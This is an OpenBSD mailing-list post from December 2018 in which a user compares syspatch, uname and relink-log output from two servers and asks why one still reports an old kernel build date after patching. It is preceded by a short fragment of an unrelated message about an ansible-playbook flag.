`--hail-puffy-full-of-grace` flag on `ansible-playbook`")


In this particular case -- where I frequently need to spin up servers in exotic 
and unusual places -- it's not ideal, of course.




syspatch, relink and kernel version/date

2018-12-20 Thread Kapetanakis Giannis
Hi,

I'm a bit confused about syspatch and kernel updates. One of machines after 
latest syspatch (009) and after reboot it lists old kernel date.

This happens only on this machine. I've seen it happen before, not sure if it 
was on the same one or some other box.

machine1:
# syspatch -l
001_xserver
002_syspatch
003_portsmash
004_lockf
005_perl
006_uipc
007_smtpd
008_qcow2
009_recvwait

# uname -prsv
OpenBSD 6.4 GENERIC.MP#364 amd64

# sysctl kern.version
kern.version=OpenBSD 6.4 (GENERIC.MP) #364: Thu Oct 11 13:30:23 MDT 2018
dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

machine2:
# syspatch -l
001_xserver
002_syspatch
003_portsmash
004_lockf
005_perl
006_uipc
007_smtpd
008_qcow2
009_recvwait

# uname -prsv
OpenBSD 6.4 GENERIC.MP#2 amd64

# sysctl kern.version
kern.version=OpenBSD 6.4 (GENERIC.MP) #2: Tue Dec 18 13:17:16 CET 2018

r...@syspatch-64-amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

on machine1 relink.log seems fine:
# cat /usr/share/relink/kernel/GENERIC.MP/relink.log 
(SHA256) /bsd: OK
LD="ld" sh makegap.sh 0x
ld -T ld.script -X --warn-common -nopie -o newbsd ${SYSTEM_HEAD} vers.o ${OBJS}
textdatabss dec hex
104959482796320 671744  13964012d512ec
mv newbsd newbsd.gdb
ctfstrip -S -o newbsd newbsd.gdb
mv -f newbsd bsd
umask 077 && cp bsd /nbsd && mv /nbsd /bsd &&  sha256 -h /var/db/kernel.SHA256 
/bsd

Kernel has been relinked and is active on next reboot.

SHA256 (/bsd) = 8b216c359324a4a938bd35c2c97416b62ffec8c8b955f8b86d65ddf9dc0d71b1

Also /bsd has newer date so it seems updated.
# ls -ld /bsd
-rwx--  1 root  wheel  15461926 Dec 19 10:04 /bsd*

# ls -ld /usr/share/relink/kernel/GENERIC.MP/relink.log
-rw-r--r--  1 root  wheel  486 Dec 19 10:04 
/usr/share/relink/kernel/GENERIC.MP/relink.log

can someone explain this?

thanks

G